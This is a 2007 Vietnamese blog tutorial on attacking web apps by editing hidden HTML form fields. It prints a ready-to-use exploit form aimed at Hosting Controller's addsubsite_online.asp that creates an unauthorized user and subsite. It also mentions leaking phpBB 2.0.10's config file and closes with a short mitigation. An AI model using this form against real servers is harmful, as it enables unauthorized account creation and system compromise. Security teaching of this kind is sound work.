Saturday, January 13, 2007

Bài 2 : Thao tác qua các biến ẩn của Form Posting

Khi xây dựng form hay một số ứng dụng web Ap có khả năng xử dụng các form save thành html về PC của attacker để thay đổi các biến ẩn của form để khai thác hệ thống hay web app.
Ngoài việc tấn công qua biến ẩn của form, Attcker có thể sử thay đổi các thành phần trên form như độ dài của ô nhập dữ liệu để tấn công tràn bộ đệm

Bài học :

Các bạn dễ dàng tìm thấy khá nhiều các bugs nổi tiếng khai thác qua biến ẩn của form như Hosting controller Hotfix 6.2 có thể add được thêm USER cho server Windows hosting mà Kẻ hiếu học đã công bố trên SECURITYFOCUS năm ngoái

Code Form:
Code

<FORM action="http://[target]/admin/hosting/addsubsite_online.asp" method="post">
<INPUT type="hidden" name="domaintypecheck" value="SECOND" id="Hidden1">
Domain: <INPUT name="DomainName" value="hcegroup.net" id="Hidden2"><BR>
Username: <INPUT name="loginname" value="kehieuhoc" id="Hidden3"><BR>
<INPUT type="hidden" name="Quota" value="-1" id="Hidden4">
<INPUT type="hidden" name="htype" value="27" id="htype5" >
<INPUT type="hidden" name="choice" value="1" id="Hidden6" >
Password: <INPUT name="password" value="kehieuhoc" id="Hidden7"><BR><BR>
<input type="submit" value="Make">
</FORM>

Hãy xem mô hình của 01 Form HTML exploit qua biến ẩn


Và đây là kết quả Exploit


Thông qua khai thác bằng cách này, toàn bộ File config của PHPBB 2.0.10 đã bị show ra một cách dễ dàng

Các bạn có thể bổ xung thêm nhiều Bug có thể hack qua khai thác biến ẩn của form và liệt kê ngay dưới đây coi như bài tập về tình huống này. Rất mong các bạn đóng góp ý kiến và cùng tham gia

Cách khắc phục : Dùng biến sessionID hay MD5 tạo chuỗi mẫu trong xử lý dữ liệu liên quan đi kèm để so sánh hoặc hạn chế chỉ dùng biến ẩn form cho hiển thị chứ không nên dùng cho việc xử lý dữ liệu liên quan

HYXD

No comments:

Post a Comment